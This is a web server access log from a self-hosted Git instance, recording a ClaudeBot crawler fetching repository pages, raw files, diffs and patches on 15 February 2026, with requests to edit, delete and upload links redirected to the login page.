"https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/status.json" -[15/Feb/2026:10:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" [Client 216.73.216.188] [Length 30915] [Gzip 9.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcompare%2Fmain..main" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 216.73.216.188] [Length 962] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py?display=source" [Client 216.73.216.188] [Length 14523] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 216.73.216.188] [Length 915] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" [Client 216.73.216.188] [Length 14171] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" [Client 216.73.216.188] [Length 11668] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/docker-compose.yml" -[15/Feb/2026:10:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.patch" [Client 216.73.216.188] [Length 663] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 13856] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" [Client 216.73.216.188] [Length 9911] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 9832] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" [Client 216.73.216.188] [Length 131072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" [Client 216.73.216.188] [Length 157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 31552] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" [Client 216.73.216.188] [Length 11845] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 1854] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components" [Client 216.73.216.188] [Length 9775] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" [Client 216.73.216.188] [Length 459] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs?display=source" [Client 216.73.216.188] [Length 11343] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/metadata.json" -[15/Feb/2026:10:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js" [Client 216.73.216.188] [Length 10324] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static" [Client 216.73.216.188] [Length 10053] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2FProgram.cs" [Client 216.73.216.188] [Length 28651] [Gzip 6.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj?display=rendered" [Client 216.73.216.188] [Length 11163] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" [Client 216.73.216.188] [Length 11033] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs?display=source" [Client 216.73.216.188] [Length 12187] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 216.73.216.188] [Length 588] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Services.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/templates" -[15/Feb/2026:10:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" [Client 216.73.216.188] [Length 14314] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Services.tsx" -[15/Feb/2026:10:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" [Client 216.73.216.188] [Length 11225] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs?display=source" [Client 216.73.216.188] [Length 11770] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" [Client 216.73.216.188] [Length 129] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components" [Client 216.73.216.188] [Length 10842] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" [Client 216.73.216.188] [Length 10535] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/keys.json" [Client 216.73.216.188] [Length 13005] [Gzip 2.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets" -[15/Feb/2026:10:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" [Client 216.73.216.188] [Length 10321] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj?display=source" [Client 216.73.216.188] [Length 11550] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcompare%2Fmain...main" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 216.73.216.188] [Length 9830] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.diff" [Client 216.73.216.188] [Length 361] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker?display=rendered" [Client 216.73.216.188] [Length 16029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" [Client 216.73.216.188] [Length 11578] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/templates/index.html" -[15/Feb/2026:10:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt" [Client 216.73.216.188] [Length 10091] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" [Client 216.73.216.188] [Length 10852] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data" -[15/Feb/2026:10:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json?display=source" [Client 216.73.216.188] [Length 11276] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json?display=rendered" [Client 216.73.216.188] [Length 11181] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?files=.TemporaryDocument" [Client 216.73.216.188] [Length 17137] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py?display=source" [Client 216.73.216.188] [Length 16404] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj" [Client 216.73.216.188] [Length 9805] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 11342] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug" [Client 216.73.216.188] [Length 9849] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/metadata.json" -[15/Feb/2026:10:52:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/assets/images" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcConnectionTest%2FProgram.cs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 10076] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" [Client 216.73.216.188] [Length 12605] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets" [Client 216.73.216.188] [Length 10886] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" 